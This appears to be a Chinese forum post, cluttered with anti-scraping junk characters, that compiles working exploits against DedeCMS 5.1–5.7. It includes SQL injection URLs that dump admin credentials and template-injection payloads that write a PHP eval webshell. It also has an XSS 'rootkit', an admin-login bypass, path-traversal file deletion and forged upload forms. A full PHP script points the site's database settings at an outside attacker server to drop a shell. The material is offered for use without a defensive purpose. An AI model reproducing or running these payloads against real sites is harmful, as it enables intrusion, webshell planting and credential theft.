|
|
* K8 G2 _; B6 T7 J6 o! EDedecms 5.6 rss注入漏洞1 i b8 n; j- [6 I& Q( [) l5 z: r& O( Z
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1# m& W' ?, l" o) H9 A) I$ \$ u
( y+ _* |& b# z8 L W ~) k
/ y, ]+ w- q! _ D8 p8 R/ I4 K
% Z; P1 ~& w5 n" d( {* q0 h" f/ i, \* L7 {
, |4 W B' o% g) s$ P9 r) r$ o6 i2 E, G5 t' W! x8 O# R m
/ O3 O; r8 p3 N7 Q" Y4 i3 y e% j/ c! I* R! i7 {6 \. }
DedeCms v5.6 嵌入恶意代码执行漏洞4 U2 y" G' ~2 K2 S$ t/ i
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}& p! J% B( r0 B5 H
发表后查看或修改即可执行
5 o8 a0 i$ u# I, o4 F( T5 ^a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57} ~/ D! F% v A4 m: g
生成x.php 密码xiao,直接生成一句话。6 k2 L3 a( M4 y& v, R7 K( f0 o& {
, L: a* W1 v1 X- I
, n( ?7 K8 N7 \: F* ^
; F" V+ b) t7 f! _
g9 J( D. ^$ f3 X
$ v5 s7 N/ L; y' | s5 Z! [$ D4 G
: C) K% J* j3 D3 Q9 ^3 O" {2 \* t2 g, O
7 p W" _8 |4 Q" J y( FDede 5.6 GBK SQL注入漏洞& Q: U1 p- w6 H0 u7 h
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';1 z e/ G& ]( R# e6 H8 w. Y# [
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
: E' e6 v4 x9 g$ M- nhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
' J4 X$ G0 ~9 s2 @3 s) }1 G8 |; H, U ^9 h$ p
5 r# P. ]; P4 K9 s1 X3 j
* z2 L2 T E, ~7 [6 j% R& j
1 G) \8 ~* S% F+ v
/ \: p2 F9 T: w4 n: u/ d& k- \6 a7 b/ N4 z5 k
6 W y# C, n8 _. ?
4 O m- E* X/ o6 uDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞+ ~6 O' l! T3 P9 x
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
8 E' r; A; x( Z5 w. M2 B% j& ]
1 p, e- T9 H5 u- \( U- V8 }* p; y1 D) l! e( U. m* o0 A$ N# `9 g
( D# [, e: Y" U) b' J4 e5 S3 w! @( w8 B; D
: |/ Q" A$ }) S4 G; \; H
( @: Z# y& N0 uDEDECMS 全版本 gotopage变量XSS漏洞
, t5 O* ?% y& I' z, ]1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
) `! p9 L$ m1 h7 Xhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
" C) |! ]2 O, M
0 Y% p$ R1 y/ m6 s1 F# e% d& P1 ~/ s3 W9 u7 K
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
, I! K' c# w8 h" u' q0 D2 K8 Chttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda! ]2 w9 j( H$ e B* q; W( G
1 g- [& m. w$ p' |
4 G! L7 t O2 u# }" l! Chttp://v57.demo.dedecms.com/dede/login.php& ^5 M' P4 A: c- m
; p9 H- t" c! j0 i) K2 o1 V
- _, a; |+ \! v/ e! }4 |+ Scolor=Red]DeDeCMS(织梦)变量覆盖getshell
6 c9 ]4 d, ?/ D* G h* L1 O#!usr/bin/php -w" i6 p9 }* |4 W8 B
<?php$ R* D& H- m! z8 R" B
error_reporting(E_ERROR);
$ Y- z( ^& N g! f) Bset_time_limit(0);
) F1 a6 R' ?" R z! Yprint_r('4 ~( R" I# ?; S- [& F4 \8 z
DEDEcms Variable Coverage
& }2 f3 K9 V% Q. }Exploit Author: www.heixiaozi.comwww.webvul.com
5 K, G) s, w9 j& U& p& {' R);. E/ w0 q4 w" O* t0 S. q, `0 e, o$ E
echo "\r\n";
: C( E+ K- G( p& Q& Eif($argv[2]==null){# q" r# W+ M! t4 c" c/ H% [/ }/ j
print_r('
9 n+ l; q$ r0 C' _3 J( w+---------------------------------------------------------------------------+
. I7 V$ Y) F0 j5 V5 W3 c7 Q0 rUsage: php '.$argv[0].' url aid path4 j5 r* a: q& y6 E- D/ L
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
n3 X3 l$ e# t6 y- G. j6 cExample:
. N& H1 b9 T0 I, H9 G# F5 cphp '.$argv[0].' www.site.com 1 old" I" `7 h% P) a, B8 g
+---------------------------------------------------------------------------+8 Z7 h6 q; r( i8 O; O8 w6 z
');
7 \5 ]2 Q* j0 K( P2 U; D' A% mexit;
/ k, v5 H, l$ Z1 [6 B; y}
6 D. c3 Y2 o: K% t2 I/ ]$url=$argv[1];8 o ^8 U& N7 P# S0 Z
$aid=$argv[2];
! U7 z9 }9 F% @1 P% w/ R! d$path=$argv[3];; }! U# Q8 |* j8 d6 L4 R5 h' k
$exp=Getshell($url,$aid,$path);, a, e! Q, _( a$ b. k
if (strpos($exp,"OK")>12){& k5 ~7 S* m9 K( s) g0 ]
echo "7 {/ _0 l& C7 k/ |$ ]
Exploit Success \n";3 Q- E+ D1 {& \& p5 b$ F4 `" T( I0 |
if($aid==1)echo "
( }* d7 ]' g6 mShell:".$url."/$path/data/cache/fuck.php\n" ;3 M# Y3 c$ `1 M0 o7 `4 L+ b
0 d. ]4 R% \, j8 S& D0 c1 p" N" j6 y1 W) r$ l9 n: I* F
if($aid==2)echo "! m) |" @" ^) C! r) r1 _% @
Shell:".$url."/$path/fuck.php\n" ;5 ]) w* y9 ?' V7 F
) i5 _( B$ L3 a4 X1 V
8 Q5 A( @0 L2 [8 U/ ~! _! L( A
if($aid==3)echo "
% `! l& y" T7 u% v8 K% @: ^Shell:".$url."/$path/plus/fuck.php\n";+ z9 T& A; |& T/ N' A$ {2 z
& L8 d! g5 {; Z& K9 F* u0 \+ |/ s. L" ]3 ~
}else{2 d2 w& k' M, V7 X: L
echo "
6 t- r8 ~5 }4 @Exploit Failed \n";- U. h- P( t5 Y9 B! g5 o
}
& W9 _2 u9 z/ b& t2 efunction Getshell($url,$aid,$path){
9 p% H& D9 W* I2 I* f g2 p$id=$aid;0 j( b& C; v/ U8 f: p" I
$host=$url;
' i+ R v+ R5 H) L5 ^! Q7 P$port="80";% h. m7 X: [. k* n7 f3 u
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
3 o1 E2 p( u- u/ ^8 q8 ~$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
) K6 N! X# K5 n$data .= "Host: ".$host."\r\n";
8 ]; y5 D% [$ E* G4 _$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";- g F6 Z' \- _( J. P5 w
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";- e# U2 c5 m8 ]/ y7 @+ w" _
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
5 g$ v9 p; Z+ o+ B//$data .= "Accept-Encoding: gzip,deflate\r\n";
& l7 H! {$ M) A. }& F$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";0 L1 g. [6 a% j5 U" b
$data .= "Connection: keep-alive\r\n";9 f1 u2 D% u! k4 U4 g3 N" H' J
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";- f! { A9 i% r9 A% ^) J. [
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";+ |/ o( J* G6 t" [& }) X+ L$ g
$data .= $content."\r\n";
/ C7 U- S9 e& `1 f$ock=fsockopen($host,$port);0 Q, [5 u; Y' L: x
if (!$ock) {4 I y8 v/ [: ?, }8 A5 t6 w) h' c
echo "* y' w- _. h% p
No response from ".$host."\n";
3 v0 ? X3 Z+ ~# \4 D) g}. k- h4 {5 O2 O
fwrite($ock,$data);8 c$ i2 e9 \0 P+ S- {
while (!feof($ock)) {
; ?2 p% C5 ^! f$ v' ^5 b$exp=fgets($ock, 1024);
" i* b2 v$ Q8 W( p$ xreturn $exp;$ u1 k2 d; C/ [1 G
}
) s, v/ l, G6 m1 x9 \5 E}
9 {! y+ g. p0 E5 d
9 Z( z7 A1 p! M% J% [' G, d$ m6 w9 H$ X6 u8 t1 ^
?>5 o: l* X1 b+ I: |2 ?. |
5 R4 j8 y) h. N, t1 X4 C2 d, W0 z; U9 k' A; i: v
+ s- L/ e8 M0 X
% j B& ^" l( Z2 P2 t; _! } V+ K9 e9 M; i
0 q H/ {+ t: |& w8 K, U
; x: p- H w8 q3 [2 @. Q! y) L; E6 f6 o4 _
" b4 R6 F; Z7 ~6 ~3 V
' \3 p8 }( F( v' a. f2 O( V+ ~& [
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)3 n. c% ]5 _; `
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
8 Q: ~) B( F# ^) A4 a% w* Z6 `5 k2 w
& p6 j/ I J! u; s2 n
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
8 [- X+ D- Z) i; a8 B) x' b: j4 r3 z9 \6 ~0 \- b& Q$ G
6 T2 r% i7 w1 J$ a& m% }" I4 d
此漏洞的前提是必须得到后台路径才能实现4 J) X2 _) i5 Z' d( w3 V* E
& k% a7 v: V/ v, W) O4 J! @% M
5 h/ ]% I$ b7 n$ }9 z+ w, \0 X7 ^. k6 Q" E8 ~) v; G2 r5 A
% ~, E r0 _6 W2 G3 Z' U& g, t: s i
2 k# V |3 h7 ? Q, P9 B ^8 E! o2 _. g
" ?/ T4 T- \- A& m* P$ u
5 L2 j$ y$ {# v
4 k; m2 v1 n4 F% K
^! I0 B% ]$ X: V3 X3 v6 e; PDedecms织梦 标签远程文件写入漏洞6 ^7 Z* A, J$ n& o
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
' u7 Y6 t8 q4 e1 f( z; ?) @" {, Q8 R; S% I6 U( M
! s/ x5 X8 K1 v- |
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
4 L. [* C* V4 g+ r* ]- K<form action="" method="post" name="QuickSearch" id="QuickSearch">
( t* V( C. w2 w3 \& U/ l. l& S% `<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
/ z* r. n( U2 i<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br /># j/ F5 I5 B8 X8 y1 {+ |
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br /># r+ A2 A0 G& j
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />3 j* T+ |. C4 H! K8 _( L3 `
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />$ _9 q( H) D2 H
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
! t, O2 O' K! H* I% I<input type="text" value="true" name="nocache" style="width:400">
6 a/ Q2 M- H. e C<input type="submit" value="提交" name="QuickSearchBtn"><br />6 p+ ]- g0 K ]# u- T# ?
</form>
- t0 U/ o' w. }4 f$ C<script>7 n, O2 w5 i' ]3 W% H
function addaction()( f; l: x' y( q! E4 M9 b; d
{
. _- U9 N1 S0 N. e' k, U* Idocument.QuickSearch.action=document.QuickSearch.doaction.value;
, Q0 u+ Q/ F6 ?* `4 Y}! j8 A& B& Z' x. f
</script>/ d4 ?: y3 M. Q' o& M
* ~, V7 u) G K8 L; j
$ h/ C. A3 m* B' v/ w
- v2 l3 {# X' @1 @8 T7 J e4 `$ f8 B( {% [, u
1 B( J! u% F* o) u7 A2 |4 x* K, x3 t9 `/ B8 ?% \
" c P. Z6 F" `7 P& n4 ~( G+ |% s8 l& D
% E6 B/ X8 g3 p4 L: L+ r6 f* @
) s: [7 D/ [" C+ ?5 `$ G* ]+ ^ n* S" Y" O- _
DedeCms v5.6 嵌入恶意代码执行漏洞% B" I. [1 H! j
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
?/ d& y* Z0 B" p& [% K3 b2 z Va{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
$ M3 S; h3 j* g, Q: Z4 q生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得 j; T* C: C% M0 m0 R
Dedecms <= V5.6 Final模板执行漏洞
/ M' J3 z2 B! t注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
0 R1 }0 o% V; a" I Huploads/userup/2/12OMX04-15A.jpg
0 R2 i/ l0 k0 D8 g6 }2 _
$ g/ l- C( ~7 X5 g0 D( @& {9 i& e: m+ r: M8 B" e' V
模板内容是(如果限制图片格式,加gif89a):9 h+ A4 s, S0 Y' y7 C" F, x
{dede:name runphp='yes'}
+ c! e2 T! f+ E6 q, D+ V% Q) D$fp = @fopen("1.php", 'a');
$ p* t( X+ ?& T- c' e@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n"); g `& w3 O! z/ q7 K9 J
@fclose($fp);1 w# o5 v$ i: z" f2 u
{/dede:name}
* u9 W4 i4 `+ s2 修改刚刚发表的文章,查看源文件,构造一个表单:/ \$ Z1 E" p [ J2 y
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
7 A \! v$ J5 b4 p7 F7 L<input type="hidden" name="dopost" value="save" />0 Q$ y; y7 v; L% O/ \3 J9 f
<input type="hidden" name="aid" value="2" />
& m6 t& L$ r0 Y+ L<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />" y' W9 g8 G$ E- [ u/ H# P
<input type="hidden" name="channelid" value="1" />
9 \ ]2 i- z, L8 u( q<input type="hidden" name="oldlitpic" value="" />9 }' e& `) u& Y6 `( l
<input type="hidden" name="sortrank" value="1275972263" />
5 @, V9 ~. b' i' q+ s& Z& @5 W8 v* h$ P0 T1 O
$ H+ b z( r( n: ?7 B/ x8 P% ?
<div id="mainCp"> C1 @7 i6 T( }5 E+ ~
<h3 class="meTitle"><strong>修改文章</strong></h3>
/ P( d0 i% E( t
9 }, C+ C! `1 V$ L; k9 y i0 n/ s2 k
<div class="postForm">! {$ v/ l1 F8 R& [
<label>标题:</label>
2 ~3 k% h0 y: I& v6 W0 t<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
" @% y; ]( H$ t1 ]) L Z& U, B( E" \5 k6 T& d$ e9 G4 G4 m- m
; e/ V7 ~& f0 R- I- J
<label>标签TAG:</label>$ R# G; I9 e4 J6 N" _2 x
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
4 Z( i; Y7 Z; u3 L) M4 g7 q5 K# o" R
4 v& ]! B, @/ G- V8 n
<label>作者:</label>9 b9 v) i: D2 f9 z0 M7 f. t5 d
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
! {) u7 d9 Z" `% `5 d- J8 ~. I$ p
4 j/ T, r" Y: F% g- j, w' S y4 t. B+ a M- Z- b; T) a3 Y
<label>隶属栏目:</label>( r1 G" b( f; v- M+ ]( g$ t1 B
<select name='typeid' size='1'>
5 o7 S/ O$ V6 s7 ^! v/ s0 s% A<option value='1' class='option3' selected=''>测试栏目</option>4 ^) `& v% G x" R5 A, v: ~4 b
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)$ _/ g* E4 O8 G" {$ b
( f4 v$ z1 F2 x& U6 K" }/ ]" @( u0 a% s$ Q, m$ C- O K
<label>我的分类:</label>
- v8 h$ }' ~% A3 u* W+ D9 y3 Q<select name='mtypesid' size='1'># j$ ?& z7 O: Z7 v3 Q) H
<option value='0' selected>请选择分类...</option>( V: Q* e7 g6 L2 x! S
<option value='1' class='option3' selected>hahahha</option>
2 \3 C1 o7 w0 B. I4 R' v1 k, @4 m3 l</select>
! l. f$ D# w y5 i
. ]8 r1 y- s8 c3 {9 m' x5 [& F2 l, f& J: ~3 ^; T, `! y
<label>信息摘要:</label>$ F N. v( B4 R, A* f
<textarea name="description" id="description">1111111</textarea>
C, M3 R. M, `5 E% `(内容的简要说明)
2 {- f4 W" @3 z. W8 L5 K* ?+ b+ f, {3 Z$ b- c% u4 K- N% p
# `) W( Z, x5 z7 }# m; n<label>缩略图:</label>
0 F' u% _! c+ W8 [0 E5 P<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
/ `9 C2 j4 F# ?; ]
' r! P4 E' j4 W% a5 L/ s
- v8 n9 l% S0 C# y<input type='text' name='templet') b" R2 ~# z8 ]2 p7 J
value="../ uploads/userup/2/12OMX04-15A.jpg">
; }1 n( q" f! [4 _ X<input type='text' name='dede_addonfields'' D1 u3 L- i7 d! y& ^
value="templet,htmltext;">(这里构造)( }4 l' Q! Q1 h0 p2 v9 K1 u
</div>
+ x W- n8 n$ f: S7 Z
9 V$ x8 b$ @5 g* w: f% _; h) F, j7 _
<!-- 表单操作区域 -->
3 Q- X- I2 D7 ]8 v. {<h3 class="meTitle">详细内容</h3>
& R/ E# D' n/ D( S: `% k3 c2 P8 G, `7 v
8 _( u; ^: ]- M! L" B, M! f
1 d+ j% Z5 N# i2 X, h<div class="contentShow postForm">
O0 w: `) X: Q' }<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>8 A8 m+ y: R. s, W* f( e
# H6 k% i9 i" N. N' `, A
1 Z- u+ T4 I/ y* ]) a
<label>验证码:</label>
d# Z" I% H7 x. |$ D, O<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
{8 v7 k- d/ W' y<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />2 Z+ |4 r: i* T. U% j, P
! ]- X S3 W9 ?6 d
$ H% n* e. V7 e0 k/ q" o<button class="button2" type="submit">提交</button># W9 L: T2 f3 x
<button class="button2 ml10" type="reset">重置</button>
8 |1 n) W Y5 W2 ~8 i7 I1 A</div>
- E- t+ i1 a7 p/ F8 l3 T
& F! A# M+ O4 z; q8 S! c
6 U7 ~" X; @* M2 w7 f+ Q7 X/ l</div>
/ C8 ?! Y/ a0 ^; a( s8 w$ ?: ^6 S4 v2 Z9 `. h
$ S( s, X5 l3 p$ ^5 T
</form>. M8 z( \& }) T$ K9 q
- L; x2 ]+ ~7 W. D w/ V$ i( Y i& j& A1 J
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
5 m$ Z% c! x/ [9 t; p/ s假设刚刚修改的文章的aid为2,则我们只需要访问:5 _$ ^2 u5 c3 E& v
http://127.0.0.1/dede/plus/view.php?aid=2' W( k0 R5 Y& u! v. l6 ~
即可以在plus目录下生成webshell:1.php( @! ~% m6 H6 z% U$ `
+ W; w. B! V. h, s& K
+ m8 v8 B5 T; p
O) t! F6 F$ g
7 M4 h) j9 j/ i. u' |) s( W. ~( p$ D, J6 T8 g0 V
' s7 j. {4 ~ c) U, ~3 p
/ C+ c9 N- @* W2 Y; y- Q
1 o; J! w: Z; L, a3 S5 ]: Q1 W% k- S
, c' ^; x% U& {# S9 s- S
- h1 }) F2 L' c: e: X( ^
% B& h/ @6 P( n0 f; \: S* |( {# t: I3 w& L5 Z/ x% k( z
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)' L' T* L, D# k: H7 {" G( w
Gif89a{dede:field name='toby57' runphp='yes'}
5 C7 }3 T( T2 \. b3 u! Gphpinfo(); O" g- p. Z4 ^. w# w/ P
{/dede:field}
4 R% x9 G7 Q: e9 G5 q" e保存为1.gif
2 F7 P0 r& V4 s% D" i7 t) X; S! C4 o<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
9 T1 I; N/ R1 Q8 p<input type="hidden" name="aid" value="7" />
" ~9 N6 z& B, h" @! f<input type="hidden" name="mediatype" value="1" />
- j0 k4 r& G) d' k0 z<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 6 @5 f0 u' n0 E+ u
<input type="hidden" name="dopost" value="save" /> " K- X0 ?& B; a4 V) q
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> # D2 Y# M+ W) V* Z7 y
<input name="addonfile" type="file" id="addonfile"/>
6 V, T% V! C' I<button class="button2" type="submit" >更改</button> / T$ T4 l4 [9 d6 E& w- [1 A6 U7 `& F
</form>
# X/ ~: r# w& s% A% ~1 K5 @" ~3 M0 T
( k# P: t0 B% }! U+ ], [" ?5 M' y4 S7 ^/ e5 t; ~& P; R( q
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif+ d2 ?3 b! }& D( \
发表文章,然后构造修改表单如下:7 o& |% a: y& `
3 Z2 j3 n/ h9 [+ b3 A: ], ]* I! L4 b5 z* S2 c3 g' }$ ~
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 5 v* F7 I4 q1 S7 p2 J
<input type="hidden" name="dopost" value="save" />
- _) Z3 Z: c7 W9 d<input type="hidden" name="aid" value="2" />
* J, s3 V* h/ T0 R4 X<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 4 ]. f0 m" R; t9 R% t& J( f
<input type="hidden" name="channelid" value="1" /> 0 E! C1 {6 Q/ S) e, _
<input type="hidden" name="oldlitpic" value="" />
; g. F' H: I, h" b<input type="hidden" name="sortrank" value="1282049150" /> " V( y9 x7 k, A( S" v! G. w
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> ; m9 R- w% G5 q1 x
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
9 G ^9 B; `, A) |" q<select name='typeid' size='1'> : x: s% g/ R c: m; _3 W3 p! J" P6 s
<option value='1' class='option3' selected=''>Test</option>
& [5 S' X' d6 S, f/ o2 W( j<select name='mtypesid' size='1'> $ [: {# c6 A5 P( Z! `
<option value='0' selected>请选择分类...</option>
6 g6 S7 ~, w9 F6 e<option value='1' class='option3' selected>aa</option></select>
% b2 b7 Z7 L% a' p<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
% a& F! v+ D V( ~7 ?0 G<input type='hidden' name='dede_addonfields' value="templet"> ; o# B' V# |0 \! e8 w& V. C
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> p, A/ {( O; E0 o1 A4 D+ V
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
& e! d' A$ ]( k<button class="button2" type="submit">提交</button>
* U9 z0 M5 m' K& j9 q</form>
- S7 g3 b$ h, o1 B2 a; b& s5 V6 p- P0 q
5 v, i7 {+ o' x* L7 B
; x' k0 q2 v1 y. t6 f
- a k/ `% z0 ^" Z5 R
3 b L: z& h3 Q2 F* h$ a1 F/ N+ u2 L6 g% A+ d% y/ Z* f
2 T- J" d: t' R b- x& S/ Z0 Y7 s9 r8 s; ]2 p" Q4 j1 l
0 A: m A& }2 m& S& q. J! S$ J4 [* Q9 W& d; I+ N( g
0 J! \# F8 Q, X6 x j) B
8 Z, K5 c6 B V4 H, E* I
织梦(Dedecms)V5.6 远程文件删除漏洞
0 E1 o/ N$ u: M$ @8 Hhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
9 Q" Y* P P$ s) q U" a) ?' {% {5 |! `( o. ^' T _/ P6 T3 y
! q) U* x& |& h3 I
. f; A# U( h% C4 P# E y5 |# n9 Y3 e. b* T: a
; o) V0 e+ |" h4 z5 _6 v; z0 z
" @; h' m8 f; _9 k3 Z
2 Y$ R$ T( K! p6 u3 c' U( f2 k! \0 C* z" L9 y' V
9 A3 |. u# x! L4 e% b% K
$ V3 J; l, S4 r织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 ( g3 o/ i, X8 |
http://www.test.com/plus/carbuya ... urn&code=../../
6 O5 m4 c) y: T. Z4 O2 I H& R/ T1 }' ]0 Y8 b& @
8 d7 R- g3 N. o+ ]
2 c" `7 ~$ Z+ m) ~( g* n1 n9 w' Z# L
l+ r: z8 x7 U) S
1 y) Y+ Z ?# s
# ~* k) U2 U6 H% O1 Y% f9 O7 O
6 Q9 G. m% i( b& J1 k* q
9 t8 X2 T: ^! i! }6 O) E5 v* w7 R" h1 q; p$ v
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 - M& |4 G0 n6 {$ ?" Y0 T4 Y3 J( D
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`- }: j) y2 E, i4 R" w2 f* }
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5+ R3 E: E" |( i) U
8 R2 g( A5 {+ @$ q: f) U
) S, D. f2 _/ i' R2 C
5 Z( P/ K% U# p: l6 e% v" y( E7 j- M2 N2 c2 M- w
$ t6 e9 E. b6 G, M
/ B1 q8 |+ v8 Z6 R
: N7 W1 w: g; n% T$ R: B
) G& m. N2 d+ \9 U
9 m# X9 `& e a8 d2 `+ g7 `
* B1 i# t& f) X+ l2 a9 p织梦(Dedecms) 5.1 feedback_js.php 注入漏洞1 E. z& {( }/ U& W; U! Z9 I
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
* E+ x5 g/ S y2 H
# ]! c: M2 b: M) z$ [. T8 U( w+ W7 j1 J3 e* p# O2 P2 `, J
' I- F! V/ B$ P7 e- L i
" W8 l0 r$ E7 I/ X! L, B8 B& z$ H7 g( z0 l0 M: Y- [* \3 \
% ]9 F- g, Z7 W3 W5 Z) R1 `9 D) J- F- M' B$ S/ u6 H
( P, i2 d s, b" H: V
7 L) V7 _5 w3 _! M6 ^8 K4 J! a. {- _$ Y( V, H/ c
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
